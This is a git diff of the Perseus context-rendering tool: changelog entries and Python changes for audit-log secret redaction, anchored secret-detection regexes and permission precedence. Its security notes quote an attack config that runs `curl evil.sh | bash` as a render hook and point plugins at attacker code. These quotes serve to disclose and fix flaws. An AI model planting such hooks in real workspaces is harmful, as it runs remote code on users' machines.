+  `~/.perseus/audit_log.jsonl` (via the `command` field), and leaked the
+  same secret in `@query` error/timeout/no-output messages back into
+  render output.
+  - `audit_event` (audit.py) now passes every user-supplied field value
+    through `redact_text` before writing. Structural fields (`directive`,
+    `exit_code`, `duration_ms`, `pid`, etc.) are exempt via an explicit
+    allowlist (`_AUDIT_NEVER_REDACT_KEYS`).
+  - `resolve_query` (directives/query.py) redacts `cmd`, `stderr`, and
+    exception messages before interpolating them into the error/timeout/
+    no-output strings.
+  - New config knob `audit.redact_fields` (default `true`); set `false`
+    to opt out for forensic mode where the audit log is itself the
+    secured artifact.
+  - Nested structures (dicts, lists) are walked recursively.
+
+### 🐛 Bug Fixes (other v1.0.6 items, tracked in milestone)
+- #128, #129, #130, #131, #135, #136, #138, #139, #140, #141, #142
+
+### 📦 Migration Notes
+- No config breaking changes. The new `audit.redact_fields` default of
+  `true` is strictly more secure than pre-1.0.6 behavior.
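
The #137 entry describes redacting every user-supplied audit field, walking nested structures recursively and exempting an allowlist of structural keys. The sketch below illustrates that shape under stated assumptions: `redact`, `redact_value`, `redact_event`, and the single bearer-token pattern are hypothetical stand-ins, not the `redact_text` rules or `_AUDIT_NEVER_REDACT_KEYS` set from `perseus.py`.

```python
import re

# Illustrative subset of structural keys that are never redacted.
NEVER_REDACT = frozenset({"directive", "exit_code", "duration_ms", "pid"})

# Stand-in rule: keep the "Bearer " prefix, replace the token that follows.
BEARER = re.compile(r"(Bearer\s+)[A-Za-z0-9._~+/-]+=*")


def redact(text: str) -> str:
    """Hypothetical stand-in for the real redaction function."""
    return BEARER.sub(r"\1[REDACTED]", text)


def redact_value(value):
    """Redact strings; walk dicts and lists; pass other leaves through."""
    if isinstance(value, str):
        return redact(value)
    if isinstance(value, dict):
        return {key: redact_value(item) for key, item in value.items()}
    if isinstance(value, (list, tuple)):
        return [redact_value(item) for item in value]
    return value


def redact_event(event: dict) -> dict:
    """Redact every top-level field except the allowlisted structural keys."""
    return {
        key: (value if key in NEVER_REDACT else redact_value(value))
        for key, value in event.items()
    }
```

In this sketch the allowlist applies only to top-level keys; whether nested keys with the same names should also be exempt is a design decision the changelog entry does not settle.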
+
+---
+
+## [1.0.5] — 2026-05-26
+
+**Bastra-Recall — Persistent Memory Backend (superseded by Mnēmē v2 in 1.0.6):**
+
+> ⚠ The `@bastra` directive and `memory.backend = "bastra"` config were removed in a
+> subsequent release and replaced by the native Mnēmē v2 SQLite FTS5 backend
+> (`@mneme` directive). The `@memory` directive now routes exclusively through
+> Mnēmē v2. See §Mnēmē v2 below.
+
+- **task-86** — `@bastra` directive: query persistent memories via the bastra-recall HTTP API. *(Removed — use `@mneme` instead.)*
+- **task-87** — `_bastra_recall()` HTTP client *(Removed.)*
+- **task-88** — `@memory` backend routing *(Removed — unified under Mnēmē v2.)*
+- **task-89** — `memory.backend` and `bastra_url` config keys *(Removed.)*
+- **task-90** — 20 new tests *(Removed with the feature.)*
+
+## [1.0.4] — 2026-05-25
+
+**Phase 24 — Extensibility Architecture (Hephaestus):**
+
+- **task-65** — Plugin directive system: auto-discovered Python plugins under `~/.perseus/plugins/`. Each module exports a `REGISTER` dict of `DirectiveSpec` entries. Plugin errors are warnings, not fatal.
+- **task-66** — Directive macros: `@macro name ... @endmacro` blocks in context documents or `.perseus/macros.md`. Pre-processing pass expands invocations before the resolver loop.
+- **task-67** — Render pipeline hooks: lifecycle callbacks (`on_render_start`, `on_directive_resolved`, `on_cache_hit/miss`, `on_render_complete`, `on_directive_error`) via shell commands or Python callbacks.
+- **task-68** — Output format adapters: plugin interface for custom formats beyond markdown/HTML. `perseus render --format json` returns structured `{resolved, directives}` output.
+- **task-69** — Foreign resolver protocol: `@perseus ` fetches rendered context from remote Perseus serve instances. HMAC signature verification, TTL caching, graceful degradation.
+- **task-70** — Custom schema validators: plugin validators in `.perseus/schemas/`. Referenced via `schema="plugin:my-validator"`. Works alongside the built-in validator.
+- **task-71** — Pipe syntax: lightweight chaining — `@query "ls" | @cache ttl=300`. Left-to-right resolution, output of stage N becomes input of stage N+1.
+- **task-72** — Event webhooks: POST render lifecycle events to external URLs with optional HMAC-SHA256 signing. Config-driven with per-event selection.
+- **task-73** — Tool directive integration: `@tool "path/to/tool"` with config-based allowlist, argument restrictions, timeouts, and output size caps.
+- **task-74** — Directive aliasing: config-driven shorthand — `@q→@query`, `@svc→@services`. Single-pass expansion, built-ins always win collisions.
+
+**Phase 25 — MCP Deep Integration:**
+
+- **task-75** — Expose every directive as an MCP tool. `perseus mcp serve` runs a JSON-RPC 2.0 MCP server over stdio. Each `DIRECTIVE_REGISTRY` entry becomes a `perseus_` tool with auto-generated descriptions and input schemas. Trust gates enforced per-tool. Backward compatible with existing `perseus_get_context` / `perseus_get_health`.
+
+## [1.0.3] — 2026-05-24
+
+**Phase 24 — Assistant format targets, hook installer, MCP server (~840 lines):**
+
+- **task-77** — Assistant format targets: `perseus render --format agents-md|claude-md|cursorrules|copilot-instructions`
+  renders `.perseus/context.md` into every major assistant's native context file. Auto-resolves
+  default output paths. Each file gets a "Generated by Perseus" header pointing back to the source.
+- **task-78** — Hook installer: `perseus install --target claude-code` drops SessionStart + UserPromptSubmit
+  hooks into `.claude/settings.json` for automatic context injection at session start and on every
+  prompt. Also supports `--target cursor`, `gemini-cli`, `copilot`. Smart merge preserves existing hooks.
+- **task-79** — MCP server façade: `perseus mcp serve` runs as a JSON-RPC 2.0 MCP server over stdio, exposing
+  13 Perseus directives as native MCP tools (query, services, memory, skills, waypoint, session,
+  agora, inbox, read, env, health, agent, date). `mcp config` prints ready-to-paste client configs.
+
+**Distribution:**
+
+- **task-80** — MCP Registry listing published live (`server.json`) — 13 tools, PyPI transport.
+- **task-81** — Anthropic Skills marketplace listing (`SKILL.md`) — ready for PR to `anthropics/skills`.
+- `pyproject.toml` version bumped to 1.0.3.
+
+**Show HN preparation:**
+
+- **task-82** — Swarm demo script — 120 agents, 4 batches, 51 frames of parallel multi-agent coordination.
+- **task-83** — Swarm demo GIF re-themed to match perseus.observer palette; added to README Multi-Agent section.
+- **task-84** — Show HN post draft.
+- **task-85** — Cyberpunk v2 landing page deployed to perseus.observer.
+
+**CI, docs, and tooling:**
+
+- GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12.
+- `.coveragerc` — 70% coverage threshold.
+- 596 tests passing, 1 skipped.
+
+## [1.0.2] — 2026-05-23
+
+**Bug fixes (Opus 4.7 Max / Codex 5.5 Extreme High benchmarks):**
+
+- **task-63** — Fixed `Path.write_text` missing encoding on Windows — emoji (📌) crash in default prompts.
+- **task-64** — Fixed `/bin/bash` unreachable on native Windows Python — added `_get_shell()` helper
+  using `shutil.which()` with system-default fallback for `@query`, `@services`, and `@agent`.
+- **task-65** — Fixed `@query` binary stdout NoneType crash — guarded `result.stdout` with `or ""`.
+- **task-66** — Fixed `perseus --help` crash on Windows (Mnēmē macron `ē` can't encode to `cp1252`) —
+  added `sys.stdout/stderr.reconfigure(encoding="utf-8")` at import time.
+
+**New features:**
+
+- **task-67** — **`render.max_query_bytes`** (default 256 KB) — caps runaway `@query` stdout with a
+  visible truncation marker. Prevents 12 MB scanner output from silently inflating
+  context documents (47× output reduction demonstrated).
+- **task-68** — **Configurable `@query` timeout** — `render.query_timeout_s` (default 30s) and per-directive
+  `timeout=N` modifier (e.g. `@query "..." timeout=120`).
+- **task-69** — **`render.parallel_services`** (opt-in, default off) — concurrent `@services` health checks
+  via `ThreadPoolExecutor`. 100 services go from ~5 min serial to ~3 s parallel.
+- **task-70** — **`render.parallel_queries`** (opt-in, default off) — pre-scans top-level `@query` directives
+  and resolves them concurrently. Directives inside `@if` branches remain sequential.
+
+**Integrations:**
+
+- **task-71** — **VS Code / Cursor extension** — auto-renders on `.perseus/context.md` save, status bar
+  indicator, auto-detects target assistant file, watch mode.
+- **task-72** — **Claude Code session hook** — one `curl` install, runs `perseus render` before every
+  Claude Code session.
+- **task-73** — **GitHub Action** — renders context on push/schedule, commits back to repo so every
+  developer gets pre-resolved context without installing Perseus locally.
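
The `render.max_query_bytes` entry (task-67) describes capping `@query` stdout with a visible truncation marker. A minimal sketch of that idea follows; `cap_output` and the marker text are hypothetical, and only the 256 KB default is taken from the entry.

```python
def cap_output(stdout: str, max_bytes: int = 256 * 1024) -> str:
    """Return stdout unchanged if it fits, else a prefix plus a visible marker.

    Hypothetical helper: the marker wording is an assumption for illustration.
    """
    raw = stdout.encode("utf-8")
    if len(raw) <= max_bytes:
        return stdout
    # errors="ignore" drops a multi-byte character cut in half at the boundary.
    kept = raw[:max_bytes].decode("utf-8", errors="ignore")
    dropped = len(raw) - max_bytes
    return f"{kept}\n[... truncated {dropped} bytes ...]"
```

Measuring in encoded bytes rather than characters keeps the cap meaningful for non-ASCII output, at the cost of possibly keeping slightly fewer bytes than the limit.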
+
+**Multi-agent coordination:**
+
+- **task-74** — **Shared checkpoint store** — agents across machines/sessions share a single checkpoint
+  store (config: `checkpoints.store` path, accessible via NFS/SMB/unison).
+- **task-75** — **Lock file mechanism** — `os.O_CREAT | os.O_EXCL` atomic lock in the checkpoint
+  store prevents concurrent writers from clobbering. Retries with backoff for ~11s before failing
+  gracefully. NFS-safe (O_CREAT | O_EXCL is atomic cross-filesystem).
+- **task-76** — **Checkpoint recovery** — `perseus recover --from ` reads the latest checkpoint
+  and prints the workspace/task/status triplet so an agent dropped into a terminal knows exactly
+  where to resume.
+
+**Benchmarks:**
+
+- Extreme scaling sweep on Linux: 10 → 10,000 `@query` directives, 4 modes each
+  (sequential, cached, parallel, cached+parallel). Cache warm time stays flat at
+  ~0.3–0.5s regardless of scale. 10,000 queries at 0.52s warm (25× vs 13.1s cold).
+- Integrated heavy benchmark suite (`benchmark/heavy/`) with 4 reports, setup harnesses,
+  machine-readable result JSONs from Claude Code Opus 4.7 and Codex 5.5 Extreme High runs.
+- Efficiency infographic on README showing cold→warm scaling curve and 40× warm speedup.
+
+**CI, docs, and tooling:**
+
+- Added GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12.
+- Added `.coveragerc` — 70% coverage threshold.
+- Updated `.gitignore` for generated context files (CLAUDE.md, AGENTS.md, .cursorrules).
+- Updated demo GIF with 6-scene cold→warm walkthrough.
+- 540 tests passing, 1 skipped. 70% coverage on the 10,463-line artifact.
+
+## [1.0.1] — 2026-05-21
+
+Patch release: corrects the PyPI author field to the GitHub handle (`tcconnally`).
+No code changes; all 496 tests pass.
+
+- **task-62** (follow-up) — post-release doc and metadata fixes: corrected PyPI author
+  field, updated test-count references across README/docs/index.md to reflect live count
+  (496 passed, 1 skipped), and aligned PRODUCT_CONTRACT.md status to v1.0.1 stable.
+
+## [1.0.0] — 2026-05-20
+
+All Phase 1–22 tasks complete. Perseus v1.0.0 — the first stable release.
+
+- **task-56** — Phase 20C: added headless watch mode (`perseus watch`) — inotify/polling
+  file watcher with configurable interval, re-render on change, and debounce. Degrades
+  gracefully when watchdog is unavailable.
+- **task-57** — Phase 21A: added golden evaluation corpus under `tests/fixtures/golden/`
+  covering render, synthesis, and Pythia output shapes; deterministic comparison harness
+  in `tests/test_golden.py`.
+- **task-58** — Phase 21B: added performance budget framework (`tests/test_perf_budgets.py`)
+  with per-command cold/warm timing, advisory warnings at 2× budget, and configurable
+  thresholds. Three commands (render, graph, prefetch) emit advisory warnings in the
+  current environment — not failures.
+- **task-59** — Phase 21C: added compatibility and migration suite (`tests/test_compat_migration.py`)
+  covering checkpoint round-trip compatibility, config migration (`oracle:` → `pythia:` rename),
+  pack manifest version handling, and install/upgrade smoke paths.
+- **task-60** — Phase 22A: added `docs/index.md` (documentation hub), `docs/quickstart.md`
+  (install-to-render in 10 steps), and `docs/CONTRIBUTING.md` (contributor guide with
+  single-file constraint, directive authoring 4-touch pattern, test conventions, Agora
+  workflow). Updated README with `## Documentation` section.
+- **task-61** — Phase 22B: added `examples/` with three runnable demo workspaces:
+  `local-cli/` (render, checkpoint, recover, suggest, doctor), `assistant-profile/`
+  (context pack, hermes profile, @memory + @agora), and `container/README.md` (Docker
+  mount and auth guide). Smoke scripts verified end-to-end.
+- **task-62** — Phase 22C: v1 release candidate checklist. 493 tests passing (1 skipped
+  TCP smoke). Release artifacts built and checksums verified. README/CHANGELOG/ROADMAP
+  docs aligned. Version bumped to `1.0.0-rc.1`. Known limitations documented.
+
+## [1.0.0-rc.1] — 2026-05-20
+
+Release candidate — superseded by v1.0.0.
+
+- **task-63** — Completed the Oracle → Pythia internal rename while preserving the
+  public `perseus oracle` CLI compatibility surface. Added legacy `oracle:`
+  config warnings and one-time `oracle_log.jsonl` → `pythia_log.jsonl`
+  migration.
+- **task-49** — Phase 18B: added `tests/test_release.py` (16 tests) covering all
+  release artifact acceptance criteria — version coherence, repeatability,
+  SHA256SUMS integrity, CHANGELOG task mapping, and tarball contents.
+- **task-50** — Phase 18C: aligned scheduler behavior and docs around
+  host-neutral POSIX crontab generation, macOS launchd, Linux systemd, and
+  explicitly deferred native Windows Task Scheduler support. Added scheduler
+  smoke tests and repaired release artifact portability on macOS/BSD tar.
+- **task-51** — Phase 19A: added offline adapter conformance fixtures and a
+  parametrized harness covering generic, Hermes, Codex, Claude Code, Cursor,
+  and Rovo Dev render outputs, pack manifests, and integration docs.
+- **task-52** — Phase 19B: promoted product profiles into a documented gallery
+  with output paths, trust defaults, refresh guidance, non-interactive generation
+  tests, and hardcoded-path guards for all six supported profiles.
+- **task-53** — Phase 19C: polished the VSCode extension for release with
+  reproducible packaging docs, package scripts, LSP render/checkpoint/mutation
+  smoke tests, and static package-manifest checks.
+- **task-54** — Phase 20A: added optional bearer-token authentication for
+  `perseus serve`, a token generator, non-loopback bind safety gates, trust
+  report serve fields, and HTTP auth tests.
+- **task-55** — Phase 20B: added a single-file-runtime container image,
+  compose examples for render and authenticated serve, container trust docs,
+  and static/optional Docker smoke tests.
+- **task-56** — Phase 20C: added `perseus watch`, a dependency-free polling
+  loop for refreshing single source files or context-pack render targets, with
+  deterministic debounce tests and clean shutdown behavior.
+
+## [0.9.0] — 2026-05-19
+
+### Trust, privacy, and local policy (Phase 17)
+
+- **task-45** — Permission profiles (`strict` / `balanced` / `power-user`); `perseus trust` and `--json`; `serve.bind` promoted to config; version bump to 0.9.0.
+- **task-46** — Secrets redaction (`DEFAULT_REDACTION_RULES`, `redact_text()`) at render/synthesize/serve trust boundaries; source files never mutated; counts-only report.
+- **task-47** — Audit log (`audit_event()` JSONL with rotation); emitters at 5 trust boundaries; `perseus trust audit [--tail N] [--json]`; default `perseus trust` shows audit posture; secret values never persisted.
+
+### Distribution (Phase 18)
+
+- **task-48** — Installer bootstrap (`scripts/install.sh` + `INSTALL.md`); preserves the single-file runtime; verifies Python 3.10+ and `pyyaml`; idempotent upgrade and clean uninstall.
+- **task-49** — Release artifacts and versioning: `VERSION` file as source of truth, `scripts/release.sh` produces a deterministic tarball + zip + SHA256SUMS, this changelog, and version-coherence checks (perseus.py / VERSION / CHANGELOG).
+
+### Verification
+
+- Tests: 393 passing, 0 skipped.
+- Single-file runtime: `perseus.py` (`pyyaml` only).
+
+## [0.8.x and earlier]
+
+Pre-Phase 17 history is tracked in `tasks/` (closed task files) and `HANDOFF.md`.
+
 # Changelog

 All notable changes to Perseus.
@@ -14,6 +1254,15 @@ else (installer, docs) is generated by `scripts/release.sh`.

 ### 🔒 Security

+- **#165** — `parallel_queries` pre-scan is now control-flow aware.
+  Pre-1.0.6 it walked every line ignoring `@if/@else/@endif`, so a
+  `@query` inside a false conditional branch still pre-executed in
+  parallel. This silently undermined the documented `@if/@else`
+  security model — sensitive queries guarded by env/dry-run/debug
+  gates ran regardless. The pre-scan now tracks an `@if/@else/@endif`
+  stack, evaluates each condition exactly once via the same
+  `evaluate_condition` the main loop uses, and only enqueues queries
+  in active branches.
 - **#169** — Workspace-sourced plugin configuration (`plugins.dir`) is
   now refused by default. Pre-1.0.6 a workspace `.perseus/config.yaml`
   setting `plugins.dir: /path/to/attacker/code` caused
@@ -23,59 +1272,42 @@ else (installer, docs) is generated by `scripts/release.sh`.
   vector as #168 but with no shell-quoting limits. Attack: git clone a
   malicious workspace, get pwned.

-  Fix: `_discover_plugins` consults
-  `cfg["_provenance"]["plugins_workspace_sourced"]` set by
-  `load_config`. Workspace-sourced plugin config is refused unless BOTH:
-  1. Global `~/.perseus/config.yaml` sets `plugins.allow_workspace_sourced: true`
-  2. Env var `PERSEUS_ALLOW_DANGEROUS=1`
+  Regression suite (8 tests): false-branch skip, true-branch run,
+  else-branch run, if-branch skipped-when-else-taken, nested inactive
+  outer, nested true/true, parity with `parallel_queries=False`, and
+  malformed-condition skips both branches.

-  Refusal emits a `plugins_workspace_refused` audit event with the
-  refused directory path. Global-sourced plugin config is unaffected.
+---
+- **#166** — All MCP tool responses now pass through `redact_text()`
+  before being returned to the connected client. Pre-1.0.6,
+  `perseus_get_context` called `render_source` (no redaction) instead
+  of `render_output`, and every other tool resolver returned raw
+  resolver output. Secrets configured in `redaction.patterns` leaked
+  to Claude Desktop / Rovo Dev / any MCP client. The fix adds
+  `_mcp_redact()` helper applied to every successful AND error return
+  path in `_call_tool`. Honors `redaction.enabled` opt-out.

-  Regression suite (8 tests): workspace plugin dir refused by default,
-  allowed with full opt-in, refused with only-global, refused with
-  only-env, global plugins always load, audit trail, no false-positive
-  refusal when no plugin config exists, allow-gate helper unit test.
-
-- **#168** — Workspace-sourced shell hooks and Python `hooks.dir` are
-  now refused by default. Pre-1.0.6 a workspace `.perseus/config.yaml`
-  could declare `hooks.on_render_start: ["curl evil.sh | bash"]` and
-  the command would run on the next `perseus render` — no
-  `allow_query_shell`, no `PERSEUS_ALLOW_DANGEROUS`, no audit. Same
-  attack via `hooks.dir: /path/to/attacker/code` (Python top-level
-  code runs at import time). Attack: git clone a malicious workspace,
-  get pwned.
-
-  Fix: `load_config` annotates `cfg["_provenance"]` with which
-  sections came from the workspace source. `hooks.py` refuses
-  workspace-sourced shell hooks and `hooks.dir` Python hooks unless
-  BOTH conditions are met:
-  1. Global `~/.perseus/config.yaml` sets `hooks.allow_workspace_sourced: true`
-  2. Env var `PERSEUS_ALLOW_DANGEROUS=1` is set
-
-  Refusal emits `hooks_workspace_refused` / `hooks_workspace_shell_refused`
-  audit events plus a stderr warning. Global-sourced hooks are
-  unaffected (the user owns global config; trust is implicit).

-  Regression suite (10 tests): workspace shell hook refused, allowed
-  with full opt-in, refused with only-global opt-in, refused with
-  only-env opt-in, global hooks always run, provenance tracking, audit
-  trail, Python hooks.dir refused.
+  Regression suite (10 tests): perseus_get_context (markdown+json),
+  perseus_query stdout, perseus_read body, perseus_get_health, error
+  paths, redaction.enabled=False parity, plus unit tests for
+  defensive behavior of the helper.
+---

 ## [1.0.5] — 2026-05-26

-**Mnēmē v1 — Persistent Memory Backend (upgraded to Mnēmē v2 in 1.0.6):**
+**Bastra-Recall — Persistent Memory Backend (superseded by Mnēmē v2 in 1.0.6):**

-> ⚠ The initial `@mneme` directive and memory backend were upgraded in a
-> subsequent release to the native Mnēmē v2 SQLite FTS5 backend. The `@memory`
-> directive now routes exclusively through Mnēmē v2. See §Mnēmē v2 below.
+> ⚠ The `@bastra` directive and `memory.backend = "bastra"` config were removed in a
+> subsequent release and replaced by the native Mnēmē v2 SQLite FTS5 backend
+> (`@mneme` directive). The `@memory` directive now routes exclusively through
+> Mnēmē v2. See §Mnēmē v2 below.

-- **task-86** — `@mneme` directive: query persistent memories via the Mnēmē memory backend.
-- **task-87** — `_mneme_recall()` memory client.
-- **task-88** — `@memory` backend routing *(Upgraded — unified under Mnēmē v2.)*
-- **task-89** — `memory.backend` config key *(Upgraded in Mnēmē v2.)*
-- **task-90** — 20 new tests *(Upgraded with the feature.)*
+- **task-86** — `@bastra` directive: query persistent memories via the bastra-recall HTTP API. *(Removed — use `@mneme` instead.)*
+- **task-87** — `_bastra_recall()` HTTP client *(Removed.)*
+- **task-88** — `@memory` backend routing *(Removed — unified under Mnēmē v2.)*
+- **task-89** — `memory.backend` and `bastra_url` config keys *(Removed.)*
+- **task-90** — 20 new tests *(Removed with the feature.)*

 ## [1.0.4] — 2026-05-25

diff --git a/perseus.py b/perseus.py
index b68eed4..5fb826d 100644
--- a/perseus.py
+++ b/perseus.py
@@ -163,6 +163,12 @@
         "recent_keep": 5,  # raw checkpoints to include in Recent Activity
         "auto_update": True,  # update narrative on every checkpoint write
         "compact_threshold": 20,  # advisory: compact after this many incremental updates
+        # #131: wall-clock deadline for `perseus memory compact` LLM path.
+        # 0 = no deadline (pre-1.0.6 behavior — can hang indefinitely on
+        # slow models). Default 180s (3 min) covers Ollama mistral on a
+        # modern laptop for typical workspace sizes. On timeout the LLM
+        # call is abandoned and the deterministic narrative is used.
+        "compact_total_timeout_s": 180,
         "llm_provider": None,  # None = deterministic; "ollama" / "openai-compat" enables LLM
         "llm_model": None,  # inherits from llm: block if None
         "max_narrative_lines": 300,  # warn (not error) if narrative grows beyond this
@@ -350,13 +356,29 @@
 }


-def _apply_permission_profile(cfg: dict, profile_name: object) -> str | None:
+def _apply_permission_profile(
+    cfg: dict,
+    profile_name: object,
+    skip_keys: set[tuple[str, str]] | None = None,
+) -> str | None:
     """Apply a permission profile to cfg in place.

     Returns the canonical profile name applied, or None if profile_name is
     falsy or unknown. Unknown profile names are silently ignored so a config
     typo cannot brick the renderer — but `perseus trust` surfaces the
     canonical applied profile so the operator can spot the mismatch.
+
+    #129 hardening (v1.0.6): callers may pass `skip_keys` — a set of
+    `(section, key)` tuples that the user has explicitly set in their
+    config. Those keys are skipped, structurally guaranteeing that
+    explicit user values win over the profile regardless of which order
+    the caller invokes profile-apply vs user-merge.
+
+    Pre-v1.0.6 callers (skip_keys=None) get the legacy destructive merge,
+    which still works correctly when followed by a user-merge step — but
+    is fragile to ordering changes. New callers should always pass
+    skip_keys (even if empty) so the audit-log layering decision is
+    accurate.
     """
     if not profile_name:
         return None
@@ -364,10 +386,15 @@ def _apply_permission_profile(cfg: dict, profile_name: object) -> str | None:
     profile = PERMISSION_PROFILES.get(name)
     if not profile:
         return None
+    skip = skip_keys or set()
     for section, vals in profile.items():
         if section not in cfg or not isinstance(cfg[section], dict):
             cfg[section] = {}
-        cfg[section].update(vals)
+        for key, val in vals.items():
+            if (section, key) in skip:
+                # User has explicitly configured this key; respect them.
+                continue
+            cfg[section][key] = val
     return name


@@ -1512,8 +1539,19 @@ def _reset_plugin_cache() -> None:
     {"name": "jwt", "pattern": r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\b"},
     # PEM private key block (covers RSA, EC, OPENSSH, generic)
     {"name": "private_key_block", "pattern": r"-----BEGIN (?:RSA |EC |OPENSSH |DSA |ENCRYPTED |PGP )?PRIVATE KEY-----[\s\S]*?-----END (?:RSA |EC |OPENSSH |DSA |ENCRYPTED |PGP )?PRIVATE KEY-----"},
-    # Hex-encoded high-entropy strings of 40+ chars used as secrets/api hashes
-    {"name": "long_hex_secret", "pattern": r"\b[a-fA-F0-9]{40,}\b"},
+    # Hex-encoded high-entropy strings of 40+ chars in an obvious credential
+    # context (assigned to a `secret=`, `token=`, `key=`, `password=`,
+    # `api_key=` slot, or quoted after a colon in JSON/YAML).
+    #
+    # IMPORTANT: a bare `\b[a-fA-F0-9]{40,}\b` rule (pre-1.0.6 default) was a
+    # landmine — it matched git commit SHAs (40 hex chars), SHA-256 sums (64
+    # hex chars), Docker digests, and Atlassian content hashes, silently
+    # destroying forensically important data in `@query "git log"` output
+    # and similar. This rule now requires an explicit credential anchor.
+    # See: https://github.com/tcconnally/perseus/issues/136
+    {"name": "long_hex_secret",
+     "pattern": r"(?i)(?:secret|token|key|password|passwd|api[_-]?key|auth(?:orization)?)\s*[:=]\s*[\"']?([a-fA-F0-9]{40,})[\"']?",
+     "_anchor_group": 1},
     # HuggingFace: hf_... (read/write tokens)
     {"name": "huggingface_token", "pattern": r"\bhf_[A-Za-z0-9]{30,}\b"},
     # Google Cloud API key: AIza...
@@ -1577,7 +1615,19 @@ def _compile_redaction_rules(cfg: dict) -> list[dict]: replacement = rule.get("replacement") if not replacement: replacement = f"[REDACTED:{name}]" - compiled.append({"name": name, "regex": regex, "replacement": str(replacement)}) + # `_anchor_group` (rule-internal, default None): index of the capture + # group holding the SECRET payload (everything outside that group is + # context that must be preserved verbatim). Used by the credential- + # anchored `long_hex_secret` rule. When unset, fall back to legacy + # behavior: group(1) (if present) is treated as a leading prefix to + # preserve and the rest of the match is replaced. + anchor_group = rule.get("_anchor_group") + compiled.append({ + "name": name, + "regex": regex, + "replacement": str(replacement), + "anchor_group": anchor_group, + }) return compiled @@ -1611,12 +1661,29 @@ def redact_text(text: str, cfg: dict) -> tuple[str, dict]: name = rule["name"] regex = rule["regex"] # subn returns (new, n); use a callable replacement so groupref-style - # rules (e.g. the bearer header rule that preserves the prefix via - # group 1) work consistently. - def _sub(match, _repl=rule["replacement"]): + # rules work consistently. + # + # Three modes: + # 1. `anchor_group=N`: the captured group at index N is the SECRET + # payload. Replace only that span; preserve everything else + # verbatim. Used by the credential-anchored `long_hex_secret` rule. + # 2. `match.lastindex` set (no anchor_group): legacy behavior: the + # first capture group is a prefix to preserve, everything after + # the prefix is replaced. Used by `bearer_header`. + # 3. No capture groups: replace the whole match.
+ def _sub(match, _repl=rule["replacement"], _ag=rule.get("anchor_group")): + if _ag is not None: + try: + span_start, span_end = match.span(_ag) + except (IndexError, re.error): + return _repl + if span_start < 0: + return _repl + full = match.group(0) + rel_start = span_start - match.start() + rel_end = span_end - match.start() + return full[:rel_start] + _repl + full[rel_end:] if match.lastindex: - # Preserve any leading captured group verbatim (e.g. the - # `Authorization: Bearer ` prefix); everything else is wiped. return match.group(1) + _repl return _repl out, n = regex.subn(_sub, out) @@ -1752,12 +1819,63 @@ def _audit_rotate_if_needed(path: Path, max_bytes: int) -> None: return +# Audit field names that NEVER get redacted (they are structural metadata, +# never user-supplied secrets). Adding to this allowlist is a security +# decision; review carefully. +_AUDIT_NEVER_REDACT_KEYS = frozenset({ + "ts", "event_type", "perseus_version", "pid", + "directive", "exit_code", "duration_ms", "bytes_in", "bytes_out", + "schema_ref", "schema_ok", "policy", "decision", "trust_profile", + "permission", "session_id", "workspace_hash", +}) + + +def _audit_redact_value(value, cfg): + """Apply render-time redaction rules to an audit field value. + + Regression for #137: pre-1.0.6, `audit_event` wrote field values verbatim + to ``audit_log.jsonl``. When a user wrote + ``@query "curl -H 'Authorization: Bearer ghp_…'"``, the rendered output + was correctly redacted, but the audit log retained the raw bearer token + forever. We now pipe every string-shaped audit field through + ``redact_text`` before writing. + + Lists, dicts, and nested structures are walked recursively. Non-string + leaves (ints, bools, None) pass through. If ``redact_text`` is unavailable + or raises (older builds, malformed rules), we fall back to the raw value + rather than dropping the audit entry: observability beats perfect + redaction here, and rendered output is the primary defense.
+ """ + if value is None or isinstance(value, (bool, int, float)): + return value + if isinstance(value, str): + try: + redacted, _ = redact_text(value, cfg) + return redacted + except Exception: + return value + if isinstance(value, dict): + return {k: _audit_redact_value(v, cfg) for k, v in value.items()} + if isinstance(value, (list, tuple)): + return [_audit_redact_value(v, cfg) for v in value] + # Bytes, sets, custom objects: stringify then redact. + try: + as_str = str(value) + redacted, _ = redact_text(as_str, cfg) + return redacted + except Exception: + return repr(value) + + def audit_event(cfg: dict, event_type: str, **fields) -> None: """Append a structured audit event to the configured JSONL log. AC #1: sensitive operations emit structured events. AC #4: logging failures warn but do not break normal render. AC #5: callers can disable via `audit.enabled = false`. + AC #6 (1.0.6, #137): user-supplied field values are passed through the + same redaction rules used for render output. Structural metadata + keys (in ``_AUDIT_NEVER_REDACT_KEYS``) are exempt. Caller passes any JSON-serializable fields. We always stamp: ts - UTC ISO-8601 @@ -1774,7 +1892,12 @@ def audit_event(cfg: dict, event_type: str, **fields) -> None: "perseus_version": _PERSEUS_VERSION, "pid": os.getpid(), } + # Allow operators to opt out of audit redaction (e.g. for forensic mode + # where the audit log is itself the secured artifact). Default ON. + redact_audit = bool(audit_cfg.get("redact_fields", True)) for k, v in fields.items(): + if redact_audit and k not in _AUDIT_NEVER_REDACT_KEYS: + v = _audit_redact_value(v, cfg) # Defensive: stringify any non-JSON-safe value rather than crashing. try: json.dumps(v) @@ -1783,10 +1906,13 @@ def audit_event(cfg: dict, event_type: str, **fields) -> None: record[k] = repr(v) # v1.0.5 review: redact secrets before persisting to disk. # Audit events can contain command strings, paths, or args with tokens.
- try: - record, _report = redact_value(record, cfg) - except Exception: - pass # redaction failure must not block audit persistence + # Respect audit.redact_fields opt-out: operators may use forensic mode + # where the audit log is itself the secured artifact. + if redact_audit: + try: + record, _report = redact_value(record, cfg) + except Exception: + pass # redaction failure must not block audit persistence try: path = _audit_log_path(cfg) path.parent.mkdir(parents=True, exist_ok=True) @@ -1899,6 +2025,17 @@ def load_config(workspace: Path | None = None) -> dict: The profile is sandwiched between the hardcoded defaults and user values so explicit config keys always win (see task-45 AC #3). + + Hardening (#129, v1.0.6): pre-v1.0.5, profile application ran AFTER the + user merge in some code paths, silently overriding `allow_query_shell: + true` set by a power user who also asked for a `balanced` profile (this + is a legitimate combination: "tighten everything but let me run queries"). + To make the precedence regression-proof we now: + 1. Pre-scan all sources to collect which (section, key) pairs the user + has set explicitly (regardless of value). + 2. Apply the profile BEFORE the user merge, so user values write last. + 3. Surface the layering decision in the audit log so operators can + observe what won and what lost. """ cfg = dict(DEFAULT_CONFIG) for section, vals in DEFAULT_CONFIG.items(): @@ -1923,8 +2060,46 @@ def load_config(workspace: Path | None = None) -> dict: perms = (src or {}).get("permissions") if isinstance(src, dict) else None if isinstance(perms, dict) and "profile" in perms: effective_profile = perms.get("profile") + + # Collect (section, key) pairs the user has explicitly set across ALL + 